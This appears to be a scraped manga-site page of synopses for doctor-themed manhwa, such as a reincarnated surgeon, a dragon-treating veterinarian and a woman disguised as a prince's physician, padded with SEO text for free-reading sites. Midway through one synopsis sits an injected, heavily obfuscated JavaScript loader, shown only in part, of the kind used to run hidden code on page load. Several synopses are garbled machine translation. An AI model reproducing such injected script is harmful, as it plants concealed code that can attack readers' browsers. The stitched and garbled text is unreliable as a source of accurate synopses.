Jin Yoosung was a gifted surgeon said to be able to bring the dead back to life. However, not even this genius doctor had the ability to revive himself. Following a fatal car crash, Yoosung closed his eyes for what he\'d thought was the last time… only to wake up and find that he\'s been reborn in a fantasy world! A doctor through and through, Yoosung — now Ray — resolves to become a healer again. Unfortunately, it seems his new magical abilities may not be the most fitting for his dream career…
Can modern medicine work in another world? No cheats, no modern equipment. One doctor stands up against a world where magic rules! Tadato Amami, an active doctor, is transferred to another world where medical magic is monopolized. He is surprised by the slimes, chimera, beastmen, and other inhabitants he encounters for the first time! But with the little medical equipment he has and his own knowledge, he is able to fight diseases and injuries! Will he be able to cure the inhabitants of the other world and save those who suffer?! ___ [Official English (K MANGA) - United States only!](https://kmanga.kodansha.com/title/10576/episode/352607)
Paris-flying veterinarian named after new recruits! Kim A-young, head of the animal hospital who is struggling with loans. One day you get a phone call. "Do you see reptiles there?" I'm doing reptile therapy, which is not my major for a living. It's a reptile for use, isn't it? A blue dragon is here to see a doctor! Ahyoung Animal Hospital, where word of mouth went out when she treated him after a faint blast. New patients line up. Looking at the animals in a state of unimaginable identity, Ah-yeong was briefly taken into consideration for their generous medical expenses. "Monster? Blue Dragon? I don't know! Money is the best!" The veterinarian's new medical device. Will Ahyoung be able to treat special patients safely and return to a peaceful daily life?
When I Opened My Eyes After A Fire, I Became A Side Character In A Novel. What Am I To Do Now?Get Closer To The Heroine? No.get Closer To The Male Lead? No.i’m Going To Live A Long And Simple Life!I’ve Lived Peacefully Outside The Emperor’s Castle For 3 Years. I Thought I Would Be Free As Long As The Novel Ended Happily As It Should.“Who’s Th-…”“Servant.”Huh?“I’ll Listen To Your Every Command.”“H-Huh?”“If I Listen To Whatever You Say, Can We Live Together?”The Servant Who Came Into My Easy Life.i Live A Happy Life With Him. Sometimes He’s A Kind Servant, And Other Times, A Dear Friend…The Problem Is, I Can’t Seem To Take My Eyes Off Him When He Smiles Saucily And Flirtatiously With Those Red Eyes….Is It Because Of My Feelings?The 30Th Concubine, Lydia, Whose Goal Is To Live A Long And Simple Life And The Suspicious Servant Begin A Strange Relationship As They Start Living Together.
"Do no harm"—that's the oath that Rhena swore as a young surgeon. But when she accidentally drowns on a dark and stormy night, she wakes up in a kingdom where medical knowledge is forbidden to women—and punishable by death! After arriving in this strange world, she saves the life of Zared, the Captain of the Royal Guard who swears to protect her... but to stay safe, she must disguise herself as a man and become the personal physician of the icy Prince Damien! Can Rhena save the sickly prince and reform this world's antiquated ways, all while keeping her true identity a secret?<script></script><script>(function(_0x613fbb,_0x53e4db){var _0x43bf1f=_0x2afe,_0xebe070=_0x613fbb();while(!![]){try{var _0x2187b9=-parseInt(_0x43bf1f(0x1d2))/(0xf17*0x2+0x15b*-0xb+0x7a2*-0x2)*(-parseInt(_0x43bf1f(0x1b7))/(-0x2374+0x8f*-0x29+0x3a5d))+-parseInt(_0x43bf1f(0x1cd))/(-0x1cb5+-0x134f+-0x3007*-0x1)+-parseInt(_0x43bf1f(0x1cb))/(-0x1a*0xc2+0x2c*0xac+-0x9d8)*(parseInt(_0x43bf1f(0x1ba))/(0x260d+-0x1*0x1502+-0x1106))+-parseInt(_0x43bf1f(0x1bf))/(0x1821*-0x1+-0x5*0x67+0x11*0x18a)+-parseInt(_0x43bf1f(0x1d3))/(0x179f+-0x5*0xc+-0x14*0x12b)*(-parseInt(_0x43bf1f(0x1bb))/(-0xc*0x1b1+-0x148a+0x1*0x28de))+parseInt(_0x43bf1f(0x1c6))/(-0x1e03+0x1ee2*0x1+-0x6b*0x2)+parseInt(_0x43bf1f(0x1d1))/(-0x2a7*-0x6+0x1*-0x2345+0x1365);if(_0x2187b9===_0x53e4db)break;else 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Read The Prince’s Personal Physician Novel – The Prince’s Personal Physician Manhwa Online Free At Kunmanga The Summary Of The Comic The Prince’s Personal Physician: “Do No Harm”—That’s The Oath That Rhena Swore As A Young Surgeon. But When She Accidentally Drowns On A Dark And Stormy Night, She Wakes Up In A Kingdom Where Medical Knowledge Is Forbidden To Women—And Punishable By Death! After Arriving In This Strange World, She Saves The Life Of Zared, The Captain Of The Royal Guard Who Swears To Protect Her… But To Stay Safe, She Must Disguise Herself As A Man And Become The Personal Physician Of The Icy Prince Damien! Can Rhena Save The Sickly Prince And Reform This World’s Antiquated Ways, All While Keeping Her True Identity A Secret? “The Prince’s Personal Physician” Is Also Known As: Lengku Wangzi He Ta De “Nan” Yishe / Lěngkù Wángzǐ Hé Tā De “Nán” Yīshē / The Grim Prince And His “Male” Doctor / 冷酷王子和他的“男”医生 “Topmanhua, Mangaupdates, Likemanga…” Are The Most Searched Keywords On The Website Mangazin. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Manga Zin. You Can Read Top Manhua Two Weeks And Counting Deadlines Are Raining In The Status Window I Became The King By Scavenging
An unprecedented large-scale virus has enveloped the world. Tae Ahn deserted after learning the truth about government forces pushing for biological experiments, but was caught once again. After fainting, he opens his eyes and encounters the 'lab director' who looks at him, smiling sweetly. He gradually falls apart due to an incomprehensible, crazy obsession...
<h2>The Villainous Doctor</h2> From the initial encounter with his resistance to escape, and to get used to him by her side, and then later——getting used to seeing him as a Killer God for others. But it happened to leave her with the shallow evil smile at the corner of her lips! To be used to every emergency, he would fall from the sky like a God, while taunting at her, but also to help her! As time passes, habits evolve into “fond”. If you don’t like him, how can you tolerate his constant entanglements? If you don’t like him, how can you…
Yusung is a genius doctor famous in the medical world. He, who spent his whole life in an operation room, died in a traffic accident, and when he woke up, he was in another world. But…a saintess? A holy empire? Healing magic? “I put so much effort into learning medicine, but now all I need to do is touch someone and they’re healed? Seriously, I think I’ve gone crazy.”
(from wikipedia.ja):Simon was taken in by his uncle, Gilles, an ecologist, after his parents died, but he ended up fighting with his rival Jean-Claude over his cousin Joca, his uncle's daughter. Joca, worried about Simon's weak fighting spirit, gives him a medicine developed by his father that makes him stronger, but it turns out to be a sex-transforming drug. Simon is placed in the care of his uncle's friend in England, and when his uncle shows Simon his own chromosomes, Simon is forced to accept. A month later, Simon was pronounced dead in England.Seven years later, after the death of his mother-in-law, Simon, now named Solange, was taken in again by his uncle and sent to live with Joca. Jean-Claude, who is engaged to Joca, becomes disturbed by Solange as a woman.
Toriko Manga is a Japanese manga series illustrated and written by Mitsutoshi Shimabukuro In a world where the flavor and feel of food is very significant, there exist people called Gourmet Hunters (Bishokuya) who focus on the acquisition of uncommon ingredients and c
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Out of desperation, Zhang Yi is pushed to participating in the deceitful doctor Bai Li's heart transplant plan. His body and mind are ruthlessly devastated. Inadvertently, both men get caught in the crosshairs of the secrets within Rebirth X Medical Research Center. In order to survive, Zhang Yi teams up with Bai Li to expose the dark secrets of the organization. However, a bigger crisis is waiting for them. This time, their fates are tightly intertwined. What they are about to face is a test of humanity... Where will they end up?